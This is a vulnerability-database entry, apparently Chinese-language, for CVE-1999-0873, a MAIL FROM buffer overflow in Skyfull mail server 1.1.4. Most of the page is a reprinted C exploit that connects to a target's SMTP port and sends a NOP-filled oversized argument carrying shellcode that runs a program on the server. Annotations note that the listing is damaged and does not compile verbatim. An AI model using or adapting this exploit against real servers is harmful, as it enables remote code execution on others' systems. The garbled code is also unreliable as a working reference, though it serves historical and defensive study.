Skyfull邮件服务器 MAIL FROM缓冲区溢出漏洞

Skyfull邮件服务器 MAIL FROM缓冲区溢出漏洞

漏洞ID 1105583 漏洞类型 缓冲区溢出
发布时间 1999-10-30 更新时间 2005-05-02
CVE编号 CVE-1999-0873
CNNVD-ID CNNVD-199910-055
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/19584
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199910-055
|漏洞详情
Skyfull邮件服务器存在缓冲区溢出漏洞。可以借助 MAIL FROM 指令触发该漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/759/info

The Skyfull mail server version 1.1.4 has an unchecked buffer into which the argument from the MAIL FROM command is placed. This buffer can be overwritten and arbitrary code can be executed.

/*=============================================================================
   Skyfull Mail Server Version 1.1.4 Exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN ([email protected])
  =============================================================================
*/

#include    <stdio.h>
#include    <string.h>
#include    <windows.h>
#include    <winsock.h>

/* Length in bytes of the filler buffer that becomes the MAIL FROM argument. */
#define     MAXBUF          3000
/* Offsets inside that buffer: RETADR receives a 4-byte address (JMPEAX_ADR),
 * JMPADR receives the 2-byte value 0xeb,0x80 (see main()). */
#define     RETADR          655
#define     JMPADR          651
#define     SMTP_PORT       25
/* Hard-coded absolute address placed at RETADR. It is specific to the
 * original author's target environment and is not portable; presumably it
 * only matches the process layout the 1999 exploit was written against. */
#define     JMPEAX_ADR      0xbfe0a035

/* Raw payload bytes (58 initialised, rest of the 200-byte array is zero).
 * main() overwrites bytes 0x0d-0x10 and 0x1e-0x21 with this process's own
 * addresses of LoadLibrary and GetProcAddress before sending, and appends
 * cmdbuf with strcat(); the whole thing is therefore treated as a C string
 * and must stay free of embedded NULs up to the trailing 0x00. */
unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF3,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
/* Dot-separated string appended to exploit_code in main(): a DLL name, a
 * function name and a program name. 29 characters, so the concatenation
 * fits the 200-byte array. */
unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe";

/*
 * Entry point. Connects to SMTP_PORT on the host named in argv[1], reads the
 * greeting, sends HELO, then sends one MAIL FROM command whose argument is
 * the MAXBUF-byte filler buffer with the payload embedded in it.
 *
 * Returns -1 on a usage or network error and FALSE (0) after the send.
 * No return type is declared (implicit int, pre-C99 style).
 *
 * NOTE(review): as printed, the listing has been damaged by extraction —
 * the escape sequences in the printf/sprintf strings are lost and the
 * MAIL FROM format string has been altered by an e-mail obfuscator — so it
 * does not compile verbatim. It is reproduced here as a historical record of
 * CVE-1999-0873 / BID 759; see the defect notes below.
 *
 * Observable for defenders: the MAIL FROM argument sent on the wire is
 * roughly 3000 bytes, almost entirely 0x90, far beyond any legitimate
 * address length.
 */
main(int argc,char *argv[])
{
    SOCKET               sock;
    SOCKADDR_IN          addr;
    WSADATA              wsa;
    WORD                 wVersionRequested;
    unsigned int         ip,p1,p2;
    /* static: zero-initialised, so packetbuf is NUL-terminated before the
     * first recv() — but recv() never terminates it afterwards (see below). */
    static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000];
    struct hostent       *hs;

    if (argc<2){
        printf("usage: %s VictimHostn",argv[0]); return -1;
    }
    wVersionRequested = MAKEWORD( 2, 0 );
    if (WSAStartup(wVersionRequested , &wsa)!=0){
        printf("Winsock Initialization failed.n"); return -1;
    }
    if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
        printf("Can not create socket.n"); return -1;
    }
    addr.sin_family     = AF_INET;
    addr.sin_port       = htons((u_short)SMTP_PORT);
    /* argv[1] is tried as a dotted-quad first; -1 converts to INADDR_NONE,
     * so a parse failure falls through to name resolution. */
    if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
            if ((hs=gethostbyname(argv[1]))==NULL){
                printf("Can not resolve specified host.n"); return -1;
            }
            addr.sin_family = hs->h_addrtype;
            memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
    }
    if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
        printf("Can not connect to specified host.n"); return -1;
    }
    /* Defect: recv() return value is ignored and packetbuf is not
     * NUL-terminated at the received length before being printed with %s. */
    recv(sock,packetbuf,MAXBUF,0);
    printf("BANNER FROM "%s" : %sn",argv[1],packetbuf);

    /* Fill buf with 0x90. Defect: buf has MAXBUF elements, so buf[MAXBUF]
     * writes one byte past the end of the array (into whatever follows it). */
    memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
    /* Little-endian copy of JMPEAX_ADR into buf at RETADR. */
    ip=JMPEAX_ADR;
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    buf[JMPADR  ]=0xeb;
    buf[JMPADR+1]=0x80;

    /* Append cmdbuf to the payload, then patch the payload with the
     * addresses of LoadLibrary and GetProcAddress *in this process*. This
     * presumably assumes the target's kernel32 is mapped at the same
     * address as on the attacking machine — a 1990s-era assumption that
     * does not hold on systems with ASLR. */
    strcat(exploit_code,cmdbuf);
    p1=(unsigned int)LoadLibrary;
    p2=(unsigned int)GetProcAddress;
    exploit_code[0x0d]=p1&0xff;
    exploit_code[0x0e]=(p1>>8)&0xff;
    exploit_code[0x0f]=(p1>>16)&0xff;
    exploit_code[0x10]=(p1>>24)&0xff;
    exploit_code[0x1e]=p2&0xff;
    exploit_code[0x1f]=(p2>>8)&0xff;
    exploit_code[0x20]=(p2>>16)&0xff;
    exploit_code[0x21]=(p2>>24)&0xff;
   
/* Place the payload immediately before JMPADR inside the filler. */
memcpy(buf+JMPADR-strlen(exploit_code)-1,exploit_code,strlen(exploit_code));

    /* SMTP dialogue: HELO, read reply, then the oversized MAIL FROM.
     * Defects as above: recv() length unchecked, packetbuf unterminated. */
    sprintf(packetbuf,"HELO UNYUNn");
    send(sock,packetbuf,strlen(packetbuf),0);
    recv(sock,packetbuf,MAXBUF,0);
    printf("HELO: Reply from "%s" : %sn",argv[1],packetbuf);
    /* The format string on the next line is mangled in this copy (see header
     * note); the recipient of the MAIL FROM reply is never read. */
    sprintf(packetbuf,"MAIL FROM: UNYUN <%[email protected]>rn",buf);
    send(sock,packetbuf,strlen(packetbuf),0);
    closesocket(sock);
    printf("Done.n");
    /* WSACleanup() is never called; the process exits immediately anyway. */
    return FALSE;
}
|参考资料

来源:BID
名称:759
链接:http://www.securityfocus.com/bid/759
